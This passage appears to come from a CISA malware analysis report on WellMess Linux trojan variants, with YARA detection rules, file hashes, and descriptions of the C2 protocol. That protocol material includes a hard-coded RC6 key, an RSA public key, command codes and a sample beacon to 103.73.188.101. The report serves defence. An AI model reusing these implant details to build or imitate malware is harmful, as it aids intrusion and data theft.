Trojan.Linux.Generic.105878\r\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.Generic.105878 (B)\r\nIkarus Trojan.Linux.Agent\r\nMcAfee GenericRXKJ-GH!2F9F4F2A9D43\r\nTrendMicro TROJ_FR.C35E7E37\r\nTrendMicro House Call TROJ_FR.C35E7E37\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 33 of 44\n\nSHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 34 of 44\n\n$25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\ne329607379... Connected_To 103.73.188.101\r\nDescription\r\nThis artifact is an ELF 64-bit written in Go. It has been identified as a variant of the WellMess malware family.\r\nWhen executed, it attempts to collect the following data from the victim's system:\r\n—Begin Data Collected—\r\nIP address of the victim system\r\nCurrent username\r\nDomain name\r\n—End Data Collected—\r\nThe data is stored in the following format:\r\n—Begin Format—\r\n\"200.200.200.150||root|root|e3b0c44298fc1c149afbf4c8996fb924\"\r\n—End Format—\r\nThe victim's system data is used to generate a unique identifier for the target system. This unique identifier is hexadecimal\r\nencoded and stored in the format below:\r\n—Begin Message Format—\r\n\"\r\n\u003c;head;\u003e3230302e3230302e3230302e3135307c7c726f6f747c726f6f74e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/p\u003c;he\r\n\u003c;title;\u003ea:1_0\u003c;title;\u003e\u003c;service;\u003ep\u003c;service;\u003e\"\r\n—End Message Format—\r\nIn the message above, the hexadecimal string between the \u003chead\u003e delimiters is the original encoded string. Data between the\r\n\u003ctitle\u003e delimiters control the session, while data between the \u003cservice\u003e delimiters relate to commands. Some of the\r\ncommands include the following:\r\n—Begin Commands—\r\n(fu) File upload\r\n(fd) File download\r\n(u) Change user-agent string\r\n—End Commands—\r\nThe message above, is encrypted using a hard-coded RC6 key. This key is loaded using the function \"botlib.KeyRC6\".\r\nDisplayed below is the hard coded RC6 key used to encrypt the data:\r\n—Begin RC6 Key—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 35 of 44\n\nOHVbn3Fdv/sgvP9VRO/9OQ==\r\n—End RC6 Key—\r\nThe encrypted data is encoded using the Base64 encoding function. It trims base64 \"=\" | \"/\" | \":\" and adds spaces with the\r\n\"botlib.Base64ToNormal\" function.\r\nDisplayed below is an example of how the Base64 encoded data is trimmed:\r\n—Begin Base64 encoded data—\r\nlSBUYfP7=sW93f+%2CKH+o%2CGNb+iL2o8jb+LWRTcTH+v20b+XP22L+bgli+B4E.+JaA+yVyKo+A%3Am+N8b+Hgf5+%3AzL69zU+2m8B+Azv\r\n6uDqNtIN=1.+9B7sUM+571cpj6+hfB+vdjukEY+xeS+iWSN+XbtVIB+4fxCCL.+a9el+eX90Q+hTImb+kE2pi+uV2XuDZj\r\n—End Base64 encoded data—\r\nThe final trimmed Base64 encoded data is stored in the Cookie header. The malware communicates with it C2 server at the\r\nIP address 103.73.188.101 using HTTP requests which are RSA-encrypted and Base64 encoded. The \"Cookie\" header will\r\ncontain the RC6 encrypted information, including the system unique identifier, mentioned above. The bottom of the message\r\nbody will contain a dynamically generated AES key which is encrypted utilizing a hard-coded public RSA key. The AES key\r\nwill be utilized to transfer C2 data between the remote operator and the malware, including executable scripts which are\r\nexecuted on the target system.\r\nAnalysis indicates that once a connection is established, the malware is designed to initiate command and control service\r\nfrom the remote operator using the function \"botlib.Work\". It performs functions based on the received commands:\r\n—Begin Functions—\r\nFile upload\r\nFile download\r\nChange user-agent string\r\n—End Functions—\r\nThe following Public Key is used for secure communication with the C2:\r\n—Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqU3sMUB/SEWHNe8xNSFG\r\nDMylqo/BsMvI9OdNb3keEuW57nmFctMiecNZu9c+ZGYTWBSU07cbxU045tlFOprY\r\nnhbnnnjgEDA9JCA12CUIJ5L74ERo8FuBLC18FoL5QtBrXm65RdxxuP3CRghg0amR\r\nS5aFpW8p3kpdIINXsXasnjFBw+q009u7w6rDXkK2hrpIvF2fzIrs7DrRwwKJ2lCf\r\nxgnhY00UWHohjOj3ecQQJMn71puy94pCmpv+7zAyCiYYTNyhC29xUAH1j6aBAVKI\r\nkuBXqd6461MJkGNI0pdIUev9BDeK74B7vmZ6TbQrdQ27+bNVTg6qqai+6vwLFxUB\r\nBwIDAQAB\r\n—End Public Key—\r\n103.73.188.101\r\nTags\r\ncommand-and-control\r\nPorts\r\n80 TCP\r\nHTTP Sessions\r\nPOST / HTTP/1.1\r\nHost: 103.73.188.101\r\nUser-Agent: Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0\r\nContent-Length: 423\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 36 of 44\n\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nCookie:\r\nlSBUYfP7=sW93f+%2CKH+o%2CGNb+iL2o8jb+LWRTcTH+v20b+XP22L+bgli+B4E.+JaA+yVyKo+A%3Am+N8b+Hgf5+%3AzL69zU+2m8\r\n6uDqNtIN=1.+9B7sUM+571cpj6+hfB+vdjukEY+xeS+iWSN+XbtVIB+4fxCCL.+a9el+eX90Q+hTImb+kE2pi+uV2XuDZj\r\nAccept-Encoding: gzip\r\nZ25gZ5A PuN nSBtz 5USoc 8HrEN9 DsA 2UqoV gUVciJ Ur3. RCa qNs lDr3FO vITG H69jRJ7 bfGbc8 UrO8tT\r\nLLaKll. uVuNP eKC 9uH pHy UY3G,w7 B7D6OR r:L CmaikCh. BYoOSbM aMIHrd L25LVy Gpd2jI8 kcW R98au\r\nEvcg HSFp0D9. tMg DhtzW 6Lh FuzXBD ypERa 2y:d0Bq uPnAw vyIvE. rp0LXY E6mW3E gUUJpf P1sRa9r\r\nriNN9g0 rXHfvl kly ZqZ:FB. ejr FpzCq Ey23 t0A PjPM fnlL jpr J4,0DPy. WyeM iMcK ahpo7 tIqNkH ,aYzcG\r\nOnawAk iRmPT :b0PIiN. 2q: p1k5 nD5D6lg    \r\nWhois\r\nQueried whois.apnic.net with \"103.73.188.101\"...\r\n% Information related to '103.73.188.0 - 103.73.191.255'\r\n% Abuse contact for '103.73.188.0 - 103.73.191.255' is 'query@evokedigital.in'\r\ninetnum:        103.73.188.0 - 103.73.191.255\r\nnetname:        EVOKEDS\r\ndescr:         Evoke Digital Solutions\r\nadmin-c:        RK634-AP\r\ntech-c:         RK634-AP\r\ncountry:        IN\r\nmnt-by:         MAINT-IN-IRINN\r\nmnt-irt:        IRT-EVOKEDS-IN\r\nmnt-routes:     MAINT-IN-EVOKEDS\r\nstatus:         ASSIGNED PORTABLE\r\nlast-modified: 2016-08-30T11:20:02Z\r\nsource:         APNIC\r\nirt:            IRT-EVOKEDS-IN\r\naddress:        371, Jagjivan Ram Nagar, Patnipura,Indore,Madhya Pradesh-452001\r\ne-mail:         radhe@evokedigital.in\r\nabuse-mailbox: query@evokedigital.in\r\nadmin-c:        RK634-AP\r\ntech-c:         RK634-AP\r\nauth:         # Filtered\r\nmnt-by:         MAINT-IN-EVOKEDS\r\nlast-modified: 2016-08-30T11:13:51Z\r\nsource:         APNIC\r\nperson:         Rajat Keshriya\r\naddress:        371, Jagjivan Ram Nagar, Patnipura,Indore,Madhya Pradesh-452001\r\ncountry:        IN\r\nphone:         +91 9993099926\r\ne-mail:         radhe@evokedigital.in\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 37 of 44\n\nnic-hdl:        RK634-AP\r\nmnt-by:         MAINT-IN-EVOKEDS\r\nlast-modified: 2016-08-30T11:14:18Z\r\nsource:         APNIC\r\n% Information related to '103.73.188.0/24AS135752'\r\nroute:         103.73.188.0/24\r\ndescr:         Evoke Digital Solutions Route object\r\norigin:         AS135752\r\ncountry:        IN\r\nnotify:         radhe@evokedigital.in\r\nmnt-by:         MAINT-IN-IRINN\r\nmnt-routes:     MAINT-IN-EVOKEDS\r\nlast-modified: 2016-09-19T09:13:33Z\r\nsource:         APNIC\r\n% This query was served by the APNIC Whois Service version 1.88.15-SNAPSHOT (WHOIS-US3)\r\nRelationships\r\n103.73.188.101 Connected_From e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\n103.73.188.101 Connected_From 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nDescription\r\ne329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09 and\r\n14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2 attempt to connect to the IP address.\r\n14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nTags\r\ntrojan\r\nDetails\r\nName 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nSize 2430280 bytes\r\nType ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux)\r\nMD5 861879f402fe3080ab058c0c88536be4\r\nSHA1 db4f07ecefd1e290d727379ded4f15a0d4a59f88\r\nSHA256 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\nSHA512 dd2cb0f9f0c5fb985bfc58867399a72989606066b5d943b2074bf04769175f26c19a354bb7e012a74c54a772c86d5152c46f4617f6d84e49a552\r\nssdeep 49152:c+b/fDJqZxtZWU71nFqO8apKC9AS7aAZYgBEB:R38xtZ/71FqODKCn8\r\nEntropy 7.912054\r\nAntivirus\r\nAvira LINUX/Agent.pzcai\r\nBitDefender Trojan.Linux.GenericA.37725\r\nClamAV Unix.Malware.Agent-7376649-0\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 38 of 44\n\nESET a variant of Linux/WellMess.B trojan\r\nEmsisoft Trojan.Linux.GenericA.37725 (B)\r\nIkarus Trojan.Linux.Agent\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 39 of 44\n\n$0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n14e9b5e214... Connected_To 103.73.188.101\r\nDescription\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 40 of 44\n\nThis artifact is an Ultimate Packer for eXecutable (UPX) archive containing an ELF 64-bit file written in Go that supports\r\nKorean, Japanese, Traditional Chinese, and Simplified Chinese languages. It has been identified as a variant of the WellMess\r\nmalware family.\r\nThe program is capable of encrypting, decrypting, uploading and downloading files. It can also execute commands and send\r\nand receive encrypted messages. The following is a list of the malware’s capabilities:\r\n— Begin Bot Capabilities —\r\nbotlib.EncryptText\r\nbotlib.encrypt\r\nbotlib.Command\r\nbotlib.transformRighttBytes\r\nbotlib.reply\r\nbotlib.Service\r\nbotlib.saveFile\r\nbotlib.UDFile\r\nbotlib.Download\r\nbotlib.Send\r\nbotlib.Work\r\nbotlib.chunksM\r\nbotlib.Join\r\nbotlib.wellMess\r\nbotlib.RandStringBytes\r\nbotlib.GetRandomBytes\r\nbotlib.Key\r\nbotlib.GenerateSymmKey\r\nbotlib.CalculateMD5Hash\r\nbotlib.Transf\r\nbotlib.GetLocale\r\nbotlib.Parse\r\nbotlib.Pack\r\nbotlib.Unpack\r\nbotlib.UnpackB\r\nbotlib.FromNormalToBase64\r\nbotlib.RandInt\r\nbotlib.Base64ToNormal\r\nbotlib.KeySizeError.Error\r\nbotlib.New\r\nbotlib.(*rc6cipher).BlockSize\r\nbotlib.convertFromString\r\nbotlib.(*rc6cipher).Encrypt\r\nbotlib.(*rc6cipher).Decrypt\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 41 of 44\n\nbotlib.Split\r\nbotlib.Cipher\r\nbotlib.Decipher\r\nbotlib.Pad\r\nbotlib.AES_Encrypt\r\nbotlib.AES_Decrypt\r\nbotlib.generateRandomString\r\nbotlib.deleteFile\r\nbotlib.Post\r\nbotlib.SendMessage\r\nbotlib.ReceiveMessage\r\nbotlib.Send.func1\r\nbotlib.init\r\nbotlib.(*KeySizeError).Error\r\n— End Bot Capabilities —\r\nWhen the program is executed it will attempt to contact its C2 at the IP address, 103.73.188.101 over TCP port 80. The\r\nprogram collects the IP address of the victim system, current username, and domain to send to the C2. This data string is\r\nappended with a unique SHA256 hash. The completed string is then RC6 encrypted and then Base64 encoded. Non-random\r\ncharacters are interspersed into the Base64 string for further obfuscation. The following is an example of the encoded string:\r\n— Begin Encoded String Sample —\r\nHNX7A5nA=UUn5+2g6J+emwEU+MSkFqW+FAtoNc+dtFnr.+dHFn3ip+P8I+r19+B7s+UM571cp+j6hf+BvdjukE+YxeSiW.+SNXbt+VIB4fxC+CLa9e\r\n— End Encoded String Sample —\r\nThe string is used to uniquely identify communication to and from the C2. Messages are formatted in the following manner:\r\n— Begin Message Format —\r\n\u003c;head;\u003e3230302e3230302e3230302e3232317c7c757365727c75736572e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\u003c;he\r\n\u003c;title;\u003erc\u003c;title;\u003e\u003c;service;\u003e\u003c;service;\u003e\r\n— End Message Format —\r\nIn the message above the hexadecimal string between the \u003chead\u003e delimiters is the original encoded string. This string\r\ntranslates as the following:\r\n— Begin String Translate —\r\n200.200.200.221||user|user e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\r\n— End String Translate —\r\nData between the \u003ctitle\u003e delimiters control the session, while data between the \u003cservice\u003e delimiters relate to commands.\r\nSome of the commands include the following:\r\n— Begin Commands —\r\n(fu) File upload\r\n(fd) File download\r\n(u) Change user-agent string\r\n— End Commands —\r\nDuring each C2 session an AES key is dynamically generated. The AES key is encrypted via an embedded hard coded RSA\r\npublic key before being delivered to the remote operator / C2 server. This AES key will be utilized to secure C2 sessions.\r\nThe following Public Key is used for secure communication with the C2:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 42 of 44\n\n—Begin Public Key—\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqU3sMUB/SEWHNe8xNSFG\r\nDMylqo/BsMvI9OdNb3keEuW57nmFctMiecNZu9c+ZGYTWBSU07cbxU045tlFOprY\r\nnhbnnnjgEDA9JCA12CUIJ5L74ERo8FuBLC18FoL5QtBrXm65RdxxuP3CRghg0amR\r\nS5aFpW8p3kpdIINXsXasnjFBw+q009u7w6rDXkK2hrpIvF2fzIrs7DrRwwKJ2lCf\r\nxgnhY00UWHohjOj3ecQQJMn71puy94pCmpv+7zAyCiYYTNyhC29xUAH1j6aBAVKI\r\nkuBXqd6461MJkGNI0pdIUev9BDeK74B7vmZ6TbQrdQ27+bNVTg6qqai+6vwLFxUB\r\nBwIDAQAB\r\n—End Public Key—\r\nRelationship Summary\r\n953b5fc997... Created 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\n47cdb87c27... Connected_To 85.93.2.116\r\n47cdb87c27... Created_By 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\n85.93.2.116 Connected_From 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\n5ca4a9f655... Connected_To 209.58.186.196\r\n5ca4a9f655... Connected_To 141.98.212.55\r\n141.98.212.55 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\n209.58.186.196 Connected_From 5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\r\n7c39841ba4... Connected_To 192.48.88.107\r\n192.48.88.107 Connected_From 7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\r\n192.48.88.107 Connected_From fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\r\nfd3969d323... Connected_To 192.48.88.107\r\ne329607379... Connected_To 103.73.188.101\r\n103.73.188.101 Connected_From e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\r\n103.73.188.101 Connected_From 14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\r\n14e9b5e214... Connected_To 103.73.188.101\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 43 of 44\n\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators 